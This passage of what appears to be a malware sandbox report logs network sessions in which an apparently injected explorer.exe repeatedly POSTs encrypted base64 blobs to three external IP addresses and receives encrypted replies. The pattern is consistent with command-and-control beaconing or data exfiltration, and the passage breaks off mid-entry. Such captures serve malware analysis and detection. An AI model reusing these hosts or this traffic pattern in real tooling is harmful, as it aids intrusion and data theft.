2024-07-27 06:56:48 UTC	685	IN	Data Raw: 63 6e 50 37 48 50 72 65 36 75 38 69 38 4c 67 44 48 49 38 46 73 62 32 31 2f 63 6c 4e 4a 45 53 73 46 4f 2b 61 61 4c 37 47 6b 34 69 58 4d 74 67 45 4c 2b 78 6e 2b 46 6a 70 49 37 58 62 47 51 4a 6c 4d 63 7a 5a 51 4c 6a 55 42 56 47 51 42 43 51 39 79 49 53 5a 35 37 39 30 46 39 6f 58 48 74 72 48 4c 52 7a 31 66 75 79 59 53 4d 4f 6c 38 71 75 61 71 34 6b 65 53 34 52 43 43 55 4c 61 34 66 58 30 4d 7a 56 55 72 77 77 31 53 64 44 7a 46 74 4d 65 43 73 71 7a 50 48 48 57 6f 61 33 34 53 44 6c 48 2f 6c 51 64 4e 48 4d 37 68 32 2f 75 48 55 2f 4a 43 78 58 4d 37 47 69 33 30 31 79 44 6e 7a 52 54 78 68 51 6d 74 56 66 73 4d 6f 4e 34 2b 59 31 2b 79 53 36 74 6b 4e 31 77 53 47 63 7a 4d 42 4a 4f 45 6e 5a 47 66 5a 78 35 30 4b 39 6a 68 6f 75 78 61 6a 41 47 43 32 71 2f 44 45 77 42 2b 53 44 Data Ascii: cnP7HPre6u8i8LgDHI8Fsb21/clNJESsFO+aaL7Gk4iXMtgEL+xn+FjpI7XbGQJlMczZQLjUBVGQBCQ9yISZ5790F9oXHtrHLRz1fuyYSMOl8quaq4keS4RCCULa4fX0MzVUrww1SdDzFtMeCsqzPHHWoa34SDlH/lQdNHM7h2/uHU/JCxXM7Gi301yDnzRTxhQmtVfsMoN4+Y1+yS6tkN1wSGczMBJOEnZGfZx50K9jhouxajAGC2q/DEwB+SD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	50828	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:48 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:48 UTC	1122	OUT	Data Raw: 52 57 66 73 2f 53 47 4f 77 6c 4b 47 72 6b 76 43 37 59 54 6d 30 59 7a 45 2f 78 78 77 62 77 73 48 76 36 61 35 69 30 61 61 56 2f 31 78 51 48 7a 30 34 53 5a 7a 35 64 33 63 6d 53 4c 68 45 2b 39 44 30 36 32 63 64 30 31 39 6e 34 58 49 74 64 49 54 65 43 45 33 6c 52 57 7a 48 34 77 71 65 43 68 62 32 61 54 5a 4d 4c 78 4b 41 54 6d 66 58 59 51 6c 4f 74 51 2b 65 59 76 4d 78 42 75 47 46 65 6a 6a 61 63 39 4b 6b 4c 72 6e 34 6c 51 57 4e 32 34 56 35 65 43 6c 64 70 4c 67 72 7a 57 59 4d 67 41 50 73 74 31 6e 6a 54 76 59 79 6f 72 69 48 70 7a 36 75 56 72 44 59 6d 55 39 4b 4b 41 34 69 66 41 58 6e 51 72 73 65 76 59 2b 6e 47 6b 65 67 63 44 77 34 75 74 65 54 61 54 4e 4a 51 70 7a 62 2f 51 55 42 39 7a 41 56 58 42 50 2f 71 49 4b 72 57 2b 45 2b 79 4b 77 50 36 5a 41 39 35 32 5a 4d 44 4f Data Ascii: RWfs/SGOwlKGrkvC7YTm0YzE/xxwbwsHv6a5i0aaV/1xQHz04SZz5d3cmSLhE+9D062cd019n4XItdITeCE3lRWzH4wqeChb2aTZMLxKATmfXYQlOtQ+eYvMxBuGFejjac9KkLrn4lQWN24V5eCldpLgrzWYMgAPst1njTvYyoriHpz6uVrDYmU9KKA4ifAXnQrsevY+nGkegcDw4uteTaTNJQpzb/QUB9zAVXBP/qIKrW+E+yKwP6ZA952ZMDO
2024-07-27 06:56:50 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:50 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:50 UTC	685	IN	Data Raw: 4a 36 63 42 79 47 49 39 2b 56 33 75 35 5a 6b 59 79 66 54 58 4f 74 78 71 63 63 39 51 30 6d 2f 7a 2b 42 69 51 2b 36 7a 6f 6d 79 7a 45 43 31 4f 78 69 78 4c 51 2f 70 67 61 43 2f 5a 4e 61 39 39 69 52 63 65 63 41 64 47 46 76 43 6d 6f 77 56 32 53 49 52 63 4e 30 52 6e 54 52 44 39 74 78 59 56 48 75 2b 61 2b 33 66 2b 70 52 6f 58 79 52 51 46 37 67 56 46 37 75 63 35 34 30 71 45 70 74 31 46 4e 6c 6c 36 58 57 2f 7a 64 4f 59 68 6a 64 58 4c 66 69 54 45 47 4d 4b 65 4b 55 47 55 5a 31 35 4d 45 51 31 6d 54 46 6d 77 78 32 35 79 6f 39 2f 6e 53 6e 63 76 55 6a 53 33 45 58 55 4f 6e 52 78 6e 2b 6b 57 5a 4f 65 4a 73 61 30 51 66 69 33 79 61 6f 4b 6e 51 32 2f 77 35 4c 7a 76 51 59 73 50 64 53 50 75 63 47 56 4d 5a 61 33 4d 67 63 78 62 7a 32 59 72 2b 78 56 71 52 35 57 65 66 31 76 57 68 Data Ascii: J6cByGI9+V3u5ZkYyfTXOtxqcc9Q0m/z+BiQ+6zomyzEC1OxixLQ/pgaC/ZNa99iRcecAdGFvCmowV2SIRcN0RnTRD9txYVHu+a+3f+pRoXyRQF7gVF7uc540qEpt1FNll6XW/zdOYhjdXLfiTEGMKeKUGUZ15MEQ1mTFmwx25yo9/nSncvUjS3EXUOnRxn+kWZOeJsa0Qfi3yaoKnQ2/w5LzvQYsPdSPucGVMZa3Mgcxbz2Yr+xVqR5Wef1vWh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	50829	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:50 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:50 UTC	1122	OUT	Data Raw: 42 59 42 4f 54 42 65 63 54 56 44 63 32 71 54 63 2b 56 35 79 2f 42 50 38 4a 45 6a 75 4a 71 7a 37 63 42 39 75 79 4b 39 65 4d 41 49 2f 2f 30 4a 59 74 31 42 54 42 74 77 6f 66 59 79 33 57 5a 34 37 39 62 53 6e 67 59 56 67 52 57 6b 67 43 52 6b 30 51 71 37 63 45 65 70 63 6c 6e 79 54 58 31 47 36 47 59 6e 34 6d 54 31 6e 5a 4c 61 51 73 4e 74 66 2b 63 6a 33 31 7a 37 76 48 75 34 74 73 61 6b 75 57 50 4f 37 4d 4f 6e 51 51 4f 77 31 33 65 74 58 48 63 31 30 77 59 2b 35 38 4f 64 47 33 6a 46 44 38 6f 65 34 49 71 32 69 53 33 6d 2b 45 46 45 33 45 57 74 68 38 6c 6b 70 64 36 35 50 62 69 63 66 42 75 2b 79 35 67 6d 66 52 51 61 33 53 6f 4c 6d 42 73 6c 4e 6d 76 48 48 70 4a 64 59 6a 65 57 6c 6d 36 4d 76 6c 72 6c 70 59 2f 56 63 50 79 50 79 35 49 49 6c 72 75 37 53 65 72 76 58 57 51 33 Data Ascii: BYBOTBecTVDc2qTc+V5y/BP8JEjuJqz7cB9uyK9eMAI//0JYt1BTBtwofYy3WZ479bSngYVgRWkgCRk0Qq7cEepclnyTX1G6GYn4mT1nZLaQsNtf+cj31z7vHu4tsakuWPO7MOnQQOw13etXHc10wY+58OdG3jFD8oe4Iq2iS3m+EFE3EWth8lkpd65PbicfBu+y5gmfRQa3SoLmBslNmvHHpJdYjeWlm6MvlrlpY/VcPyPy5IIlru7ServXWQ3
2024-07-27 06:56:52 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:51 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:52 UTC	685	IN	Data Raw: 65 78 47 57 37 65 4e 72 58 42 73 63 62 59 78 42 75 44 43 38 78 2b 32 75 30 43 58 37 54 32 77 4d 4a 4d 4d 50 57 53 69 73 34 56 44 51 34 64 46 6c 56 45 53 73 6f 62 66 71 65 61 72 64 56 47 66 6e 77 70 48 4e 46 6c 46 68 72 2f 47 4d 70 4a 6a 51 68 48 59 70 48 64 5a 74 39 69 4d 65 73 34 6d 32 31 66 41 63 6c 49 36 4a 6e 57 58 31 65 34 73 66 57 55 52 51 70 4f 2b 7a 56 65 2f 34 48 43 31 34 7a 77 70 56 52 4b 51 70 6a 53 71 6d 61 44 4a 2f 53 65 49 49 4c 6f 6a 43 5a 75 77 68 62 2b 6c 77 32 38 62 73 64 77 2f 74 67 45 54 31 2b 65 46 73 75 72 54 47 2b 6a 63 61 68 53 4a 56 68 36 4c 47 6a 78 33 30 6b 48 33 4a 71 49 37 73 30 53 75 30 2f 52 37 38 34 38 49 54 50 47 48 4c 55 7a 41 4a 6a 57 4b 4d 71 2f 4f 58 45 52 5a 77 5a 6e 53 79 51 6b 69 39 6c 4b 7a 64 6f 78 79 55 76 6d 4b Data Ascii: exGW7eNrXBscbYxBuDC8x+2u0CX7T2wMJMMPWSis4VDQ4dFlVESsobfqeardVGfnwpHNFlFhr/GMpJjQhHYpHdZt9iMes4m21fAclI6JnWX1e4sfWURQpO+zVe/4HC14zwpVRKQpjSqmaDJ/SeIILojCZuwhb+lw28bsdw/tgET1+eFsurTG+jcahSJVh6LGjx30kH3JqI7s0Su0/R7848ITPGHLUzAJjWKMq/OXERZwZnSyQki9lKzdoxyUvmK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	50830	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:52 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:52 UTC	1122	OUT	Data Raw: 48 56 77 37 32 56 5a 70 57 41 63 32 2b 59 44 6a 30 51 70 30 68 4f 55 35 6c 4e 64 45 33 68 79 69 6b 2f 55 38 37 54 48 6c 34 6e 33 71 78 45 31 6f 78 6a 36 49 42 4f 39 65 72 32 7a 4d 39 6e 33 78 43 39 48 4a 4d 61 6b 46 2f 32 61 37 6b 58 50 58 37 42 4d 58 6d 4f 31 57 2f 63 35 67 4a 35 39 44 67 2b 59 4e 69 68 6d 59 73 32 79 73 47 53 54 5a 65 63 79 49 46 7a 72 39 67 43 2b 4b 6f 56 34 54 75 33 34 51 67 66 4f 67 76 55 4e 72 72 65 4c 5a 43 2b 66 45 67 32 56 6e 37 62 77 73 52 46 4a 2f 70 35 47 53 50 31 78 55 34 34 69 37 5a 58 62 6b 68 6e 65 37 4f 46 63 41 5a 47 79 6c 62 41 54 2b 63 72 7a 67 66 77 46 6d 73 34 4e 4e 79 50 68 48 55 45 44 45 72 6d 39 70 33 4d 37 4c 72 74 6a 6c 70 51 39 6c 67 43 52 45 6d 62 65 77 30 4c 35 6d 46 51 75 30 65 4d 51 61 59 6f 78 56 73 4b 66 Data Ascii: HVw72VZpWAc2+YDj0Qp0hOU5lNdE3hyik/U87THl4n3qxE1oxj6IBO9er2zM9n3xC9HJMakF/2a7kXPX7BMXmO1W/c5gJ59Dg+YNihmYs2ysGSTZecyIFzr9gC+KoV4Tu34QgfOgvUNrreLZC+fEg2Vn7bwsRFJ/p5GSP1xU44i7ZXbkhne7OFcAZGylbAT+crzgfwFms4NNyPhHUEDErm9p3M7LrtjlpQ9lgCREmbew0L5mFQu0eMQaYoxVsKf
2024-07-27 06:56:53 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:53 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:53 UTC	685	IN	Data Raw: 79 45 4c 77 65 4e 51 4d 44 45 48 31 37 38 4a 43 58 77 52 4d 69 62 2b 6d 6b 67 76 71 67 55 5a 6e 5a 59 34 74 5a 6f 33 69 74 2b 6d 5a 79 64 71 5a 6f 31 4b 4c 67 61 57 68 76 53 2f 71 67 59 48 65 71 63 71 31 68 64 44 39 35 2b 6c 47 6d 37 79 39 46 34 50 2f 6b 51 49 47 76 55 4b 53 4a 33 66 75 63 6a 4d 4e 74 53 5a 4d 73 68 36 5a 68 73 51 39 7a 70 78 69 53 70 47 71 5a 6c 62 4b 48 59 62 59 61 4a 6a 51 66 4a 58 34 7a 58 51 2f 35 74 58 79 34 39 54 49 63 75 66 44 56 6e 49 35 6e 4c 50 49 57 42 63 4b 6a 58 46 37 4f 6e 79 2b 58 4d 35 66 55 58 4d 2f 43 56 38 68 2b 44 66 75 65 63 35 56 69 2b 6c 55 6e 35 66 72 4d 54 64 51 2b 78 78 6e 56 32 54 34 79 63 69 6c 74 50 33 6c 4d 34 32 66 31 4f 75 59 54 59 41 61 78 67 67 6d 54 75 48 5a 33 37 5a 43 68 75 64 7a 7a 7a 34 4c 76 77 6a Data Ascii: yELweNQMDEH178JCXwRMib+mkgvqgUZnZY4tZo3it+mZydqZo1KLgaWhvS/qgYHeqcq1hdD95+lGm7y9F4P/kQIGvUKSJ3fucjMNtSZMsh6ZhsQ9zpxiSpGqZlbKHYbYaJjQfJX4zXQ/5tXy49TIcufDVnI5nLPIWBcKjXF7Ony+XM5fUXM/CV8h+Dfuec5Vi+lUn5frMTdQ+xxnV2T4yciltP3lM42f1OuYTYAaxggmTuHZ37ZChudzzz4Lvwj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	50831	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:54 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:56:54 UTC	1267	OUT	Data Raw: 48 55 31 30 71 56 35 32 73 47 67 49 30 76 6a 56 59 67 42 36 57 45 58 46 54 76 34 54 34 7a 66 55 33 6e 6f 33 74 54 4c 52 45 5a 76 75 74 38 45 50 48 33 32 47 73 32 44 41 37 57 64 52 2f 37 62 61 30 79 45 76 42 37 43 32 68 71 6d 46 79 57 77 34 67 54 62 71 41 61 6c 53 4c 63 68 4b 4f 2b 61 66 49 35 6d 4e 42 51 32 52 55 58 56 34 47 5a 53 64 48 55 74 5a 5a 65 55 46 53 64 55 35 33 71 43 48 4c 35 4d 53 76 4a 4d 77 47 75 6e 56 4f 51 45 6c 69 43 6e 41 51 52 69 68 42 6b 62 54 44 7a 47 30 38 53 4d 38 5a 64 72 57 4a 39 46 56 47 39 62 43 6e 5a 6f 78 68 67 6b 37 66 44 79 70 4e 74 75 5a 44 2f 62 4f 6c 68 76 65 34 4b 68 35 68 39 45 6a 55 37 46 77 2f 53 57 62 69 34 4b 32 75 70 6e 43 36 68 55 33 51 4d 63 43 72 4c 6b 66 38 33 50 53 2b 66 4e 67 54 76 54 42 68 53 4d 69 54 33 57 Data Ascii: HU10qV52sGgI0vjVYgB6WEXFTv4T4zfU3no3tTLREZvut8EPH32Gs2DA7WdR/7ba0yEvB7C2hqmFyWw4gTbqAalSLchKO+afI5mNBQ2RUXV4GZSdHUtZZeUFSdU53qCHL5MSvJMwGunVOQEliCnAQRihBkbTDzG08SM8ZdrWJ9FVG9bCnZoxhgk7fDypNtuZD/bOlhve4Kh5h9EjU7Fw/SWbi4K2upnC6hU3QMcCrLkf83PS+fNgTvTBhSMiT3W
2024-07-27 06:56:55 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:55 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:55 UTC	685	IN	Data Raw: 78 43 74 6b 72 56 2b 57 45 69 75 72 70 39 64 57 39 76 70 42 64 6c 5a 58 32 34 34 70 41 56 71 56 39 36 74 48 38 6f 38 57 68 35 31 74 65 67 33 6a 6a 31 73 68 4e 34 68 6b 43 43 39 6f 57 4e 46 6a 61 54 41 31 52 47 51 72 6d 63 70 56 79 34 5a 62 32 6d 68 57 43 4e 66 58 54 79 65 46 68 6e 6d 54 38 52 34 6b 6e 51 44 39 70 6a 6d 70 37 4b 55 50 44 74 77 34 57 50 55 49 6d 2b 73 6f 67 67 7a 53 61 30 43 66 6c 51 4c 64 53 46 76 52 6f 41 70 70 37 4f 31 6f 49 57 59 6b 6f 57 75 46 77 61 63 34 41 43 54 61 51 76 43 72 4f 59 38 6d 54 68 34 71 4d 79 61 38 74 64 32 75 54 6c 56 53 62 77 50 72 50 45 38 76 5a 69 63 4e 78 73 59 78 57 49 47 6d 6f 4f 33 4a 44 4e 4d 39 53 76 55 49 48 6c 68 4c 72 6b 53 4d 4c 35 4a 7a 6f 6c 78 76 59 70 68 63 32 46 52 51 57 31 68 46 6f 73 4b 53 63 4b 31 Data Ascii: xCtkrV+WEiurp9dW9vpBdlZX244pAVqV96tH8o8Wh51teg3jj1shN4hkCC9oWNFjaTA1RGQrmcpVy4Zb2mhWCNfXTyeFhnmT8R4knQD9pjmp7KUPDtw4WPUIm+soggzSa0CflQLdSFvRoApp7O1oIWYkoWuFwac4ACTaQvCrOY8mTh4qMya8td2uTlVSbwPrPE8vZicNxsYxWIGmoO3JDNM9SvUIHlhLrkSML5JzolxvYphc2FRQW1hFosKScK1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	50832	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:56 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:56 UTC	1122	OUT	Data Raw: 41 44 55 79 6c 46 62 32 41 77 33 51 42 6b 2f 76 42 67 79 57 6d 58 75 33 74 6a 43 67 72 47 57 52 34 36 6c 4a 49 6f 32 4a 6d 51 4f 36 63 72 30 6e 44 59 61 33 57 67 64 6d 4d 39 57 63 36 6e 75 70 2f 41 48 57 64 33 4b 67 72 75 46 65 65 46 46 4d 66 36 6d 4c 54 5a 52 75 62 62 70 2b 2b 5a 35 51 49 47 75 44 4d 53 50 39 6b 68 52 7a 50 6d 71 76 39 5a 61 63 78 46 43 34 38 63 36 52 33 4a 46 61 4f 55 2b 39 50 55 58 6b 5a 59 50 54 6b 72 76 67 45 53 51 78 69 71 4b 65 77 63 37 63 78 6b 75 51 6d 4d 52 51 6f 6b 41 59 72 47 38 32 6d 54 69 56 64 77 69 6d 4f 43 34 6f 52 73 47 79 76 2f 42 4b 7a 50 64 31 52 71 63 62 62 67 52 33 67 2f 77 74 74 33 72 62 51 45 46 59 70 79 70 70 6f 71 79 62 66 54 53 57 77 43 51 6b 78 32 67 4e 4d 41 69 55 41 2f 4b 49 79 50 56 33 5a 55 68 47 56 54 47 Data Ascii: ADUylFb2Aw3QBk/vBgyWmXu3tjCgrGWR46lJIo2JmQO6cr0nDYa3WgdmM9Wc6nup/AHWd3KgruFeeFFMf6mLTZRubbp++Z5QIGuDMSP9khRzPmqv9ZacxFC48c6R3JFaOU+9PUXkZYPTkrvgESQxiqKewc7cxkuQmMRQokAYrG82mTiVdwimOC4oRsGyv/BKzPd1RqcbbgR3g/wtt3rbQEFYpyppoqybfTSWwCQkx2gNMAiUA/KIyPV3ZUhGVTG
2024-07-27 06:56:57 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:57 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:57 UTC	685	IN	Data Raw: 73 62 47 56 4d 42 39 41 37 42 53 4a 45 4c 6d 48 70 68 7a 44 71 30 77 78 75 77 69 69 47 46 49 73 2b 68 5a 38 78 52 46 36 73 70 36 79 4e 4f 6d 36 44 79 41 6d 37 58 69 6c 47 5a 4c 70 5a 44 70 30 47 48 41 39 34 48 4b 4a 38 76 44 42 62 4a 41 4e 48 65 48 67 70 68 52 2f 6b 54 64 62 31 54 2b 74 42 6b 54 4a 67 68 33 35 61 5a 42 4f 4d 34 76 46 2f 48 4c 34 6b 4e 41 4c 4a 54 46 53 4d 54 69 44 57 35 6b 4c 42 65 6d 7a 4f 57 4f 63 51 55 47 79 75 4a 47 31 36 67 4c 79 6d 64 45 6e 38 54 6e 4b 56 43 7a 52 72 49 63 34 61 44 4f 43 76 6e 68 73 51 68 4e 30 4a 2b 6b 43 65 61 4e 79 37 62 61 54 53 65 44 79 31 66 51 38 4d 31 57 45 63 70 65 48 2f 75 6f 4e 4e 44 4d 31 70 50 58 51 61 4d 6c 72 6a 61 69 52 67 48 70 67 69 42 45 41 4c 5a 68 4c 74 38 74 72 4d 62 34 71 53 66 4c 67 68 42 73 Data Ascii: sbGVMB9A7BSJELmHphzDq0wxuwiiGFIs+hZ8xRF6sp6yNOm6DyAm7XilGZLpZDp0GHA94HKJ8vDBbJANHeHgphR/kTdb1T+tBkTJgh35aZBOM4vF/HL4kNALJTFSMTiDW5kLBemzOWOcQUGyuJG16gLymdEn8TnKVCzRrIc4aDOCvnhsQhN0J+kCeaNy7baTSeDy1fQ8M1WEcpeH/uoNNDM1pPXQaMlrjaiRgHpgiBEALZhLt8trMb4qSfLghBs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	50833	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:56:58 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:56:58 UTC	1122	OUT	Data Raw: 6c 4a 56 75 72 74 32 62 65 45 51 73 6b 65 7a 6c 61 76 50 53 6e 64 56 47 2f 43 4d 4d 76 61 64 4f 62 55 6d 38 4b 4a 36 4e 41 43 61 78 66 66 72 73 54 69 6c 51 77 68 64 78 48 76 73 39 6c 68 46 30 6b 58 43 59 51 42 7a 56 39 77 52 6f 65 70 37 37 37 68 6e 38 69 48 48 63 7a 44 32 69 70 53 66 62 68 6c 5a 44 77 52 4d 70 45 74 67 43 54 59 39 74 2f 68 6e 79 2f 66 47 39 39 43 6d 71 4b 65 76 6d 75 46 6f 71 63 34 67 48 70 6b 76 41 79 75 68 4a 74 43 5a 78 59 63 48 34 66 44 49 51 4b 34 6e 4d 65 30 59 46 63 53 59 51 51 30 34 6e 6c 63 45 4e 56 41 75 76 33 31 6e 77 74 48 6b 4b 35 38 57 4f 46 76 37 59 75 70 64 4a 33 4c 79 57 4d 6b 72 43 43 38 5a 31 4a 78 2b 39 64 34 48 36 71 72 6c 65 56 56 68 49 39 65 39 4b 33 53 42 68 2b 76 35 47 6a 39 66 41 4a 58 47 70 58 43 52 68 37 76 4e Data Ascii: lJVurt2beEQskezlavPSndVG/CMMvadObUm8KJ6NACaxffrsTilQwhdxHvs9lhF0kXCYQBzV9wRoep777hn8iHHczD2ipSfbhlZDwRMpEtgCTY9t/hny/fG99CmqKevmuFoqc4gHpkvAyuhJtCZxYcH4fDIQK4nMe0YFcSYQQ04nlcENVAuv31nwtHkK58WOFv7YupdJ3LyWMkrCC8Z1Jx+9d4H6qrleVVhI9e9K3SBh+v5Gj9fAJXGpXCRh7vN
2024-07-27 06:56:59 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:56:59 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:56:59 UTC	685	IN	Data Raw: 52 74 62 71 58 75 48 52 62 4c 76 6b 2f 4c 4e 4d 50 4d 63 73 4b 53 67 58 72 6b 72 5a 39 50 62 54 61 76 76 6b 30 7a 41 39 52 75 59 4e 48 56 61 65 31 41 77 4a 41 51 57 6e 45 32 70 4c 39 34 72 5a 5a 4f 5a 36 64 6d 79 67 44 4e 45 65 67 46 4a 65 35 6c 54 6a 59 7a 4d 2f 68 77 6a 37 63 54 58 44 63 4d 69 6a 4b 6e 2b 50 50 58 54 37 51 55 4d 69 74 2f 78 48 4f 78 61 54 78 34 55 4d 5a 38 31 77 79 77 45 77 49 35 65 76 4f 30 5a 31 58 70 75 61 75 51 48 49 4d 45 44 53 57 4b 5a 4b 4a 4b 39 70 6e 49 2b 32 36 42 6c 77 74 58 65 33 37 69 51 73 57 34 6b 64 32 42 77 35 71 58 75 77 4e 52 39 59 67 4d 58 70 5a 61 2b 63 32 52 50 7a 52 78 68 33 4a 79 6f 6a 6b 6e 6e 6d 41 53 48 78 5a 33 78 70 37 77 63 57 79 78 53 5a 38 7a 72 6d 67 39 4f 63 45 53 32 36 34 47 34 75 64 61 78 30 51 2b 36 Data Ascii: RtbqXuHRbLvk/LNMPMcsKSgXrkrZ9PbTavvk0zA9RuYNHVae1AwJAQWnE2pL94rZZOZ6dmygDNEegFJe5lTjYzM/hwj7cTXDcMijKn+PPXT7QUMit/xHOxaTx4UMZ81wywEwI5evO0Z1XpuauQHIMEDSWKZKJK9pnI+26BlwtXe37iQsW4kd2Bw5qXuwNR9YgMXpZa+c2RPzRxh3JyojknnmASHxZ3xp7wcWyxSZ8zrmg9OcES264G4udax0Q+6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	50834	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:57:00 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:57:00 UTC	1122	OUT	Data Raw: 58 75 68 62 42 2f 6f 37 66 65 31 78 63 4b 35 43 4e 5a 4d 65 51 35 64 76 61 72 6b 4d 64 66 46 73 41 39 70 68 78 4a 2f 4a 43 4e 69 7a 41 51 71 5a 37 6a 58 4d 63 6d 48 53 2b 75 6f 4a 46 6a 4c 76 2f 2f 42 6f 72 51 4d 4b 48 65 76 55 70 67 33 4f 45 44 30 55 70 7a 65 4f 52 7a 49 41 43 37 4f 79 63 79 50 33 68 5a 50 69 4c 51 5a 6c 42 68 32 4d 6c 4a 4a 67 57 4a 71 47 54 44 54 67 48 64 58 6a 50 6b 52 4d 62 38 59 43 61 33 73 6e 58 47 79 34 79 6e 6b 68 31 2b 71 46 6b 6e 36 7a 79 59 43 5a 42 61 70 79 6e 6f 70 34 53 69 35 4d 54 5a 62 65 31 70 78 7a 79 67 61 79 35 39 34 37 31 66 6e 46 38 42 7a 51 75 77 6a 66 76 42 46 72 4f 59 77 62 45 34 35 6c 77 44 6b 51 6d 6d 72 35 43 4f 39 4d 78 35 70 75 6f 7a 46 79 36 45 36 6e 4c 44 39 56 58 30 62 33 54 34 75 78 5a 6f 6d 4a 4a 34 42 Data Ascii: XuhbB/o7fe1xcK5CNZMeQ5dvarkMdfFsA9phxJ/JCNizAQqZ7jXMcmHS+uoJFjLv//BorQMKHevUpg3OED0UpzeORzIAC7OycyP3hZPiLQZlBh2MlJJgWJqGTDTgHdXjPkRMb8YCa3snXGy4ynkh1+qFkn6zyYCZBapynop4Si5MTZbe1pxzygay59471fnF8BzQuwjfvBFrOYwbE45lwDkQmmr5CO9Mx5puozFy6E6nLD9VX0b3T4uxZomJJ4B
2024-07-27 06:57:01 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:57:01 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:57:01 UTC	685	IN	Data Raw: 53 34 4c 36 38 52 62 6f 69 70 79 6b 52 45 44 6e 4d 78 6b 6e 34 5a 42 4f 4b 78 43 42 72 75 77 6d 47 64 31 44 31 65 79 66 49 4c 6a 64 76 33 6a 73 49 73 78 48 51 51 57 57 4d 53 72 55 2f 64 57 37 56 33 49 6a 50 6d 6e 30 38 51 75 7a 36 78 6f 59 33 6f 4d 53 74 73 38 79 59 49 4f 6b 6a 33 53 4c 67 75 72 38 47 67 6f 55 4e 7a 56 39 75 6d 4a 51 4d 2b 57 59 68 43 51 6f 74 63 74 47 52 49 53 39 49 46 76 72 4d 53 53 4f 37 34 34 4a 34 58 47 44 47 39 56 50 64 44 46 33 71 37 5a 67 4c 56 70 2b 67 4f 39 54 6c 46 54 75 31 36 63 71 72 59 36 63 52 73 77 64 46 49 77 73 74 55 6e 31 76 55 4e 59 77 78 54 37 6d 65 4f 54 39 6d 36 41 42 57 44 75 4e 37 4b 48 2b 6c 35 66 2b 76 59 49 64 78 72 5a 53 39 72 59 57 51 4b 41 39 4b 69 48 5a 4b 53 77 74 48 7a 34 66 71 52 35 44 63 35 4d 53 73 50 Data Ascii: 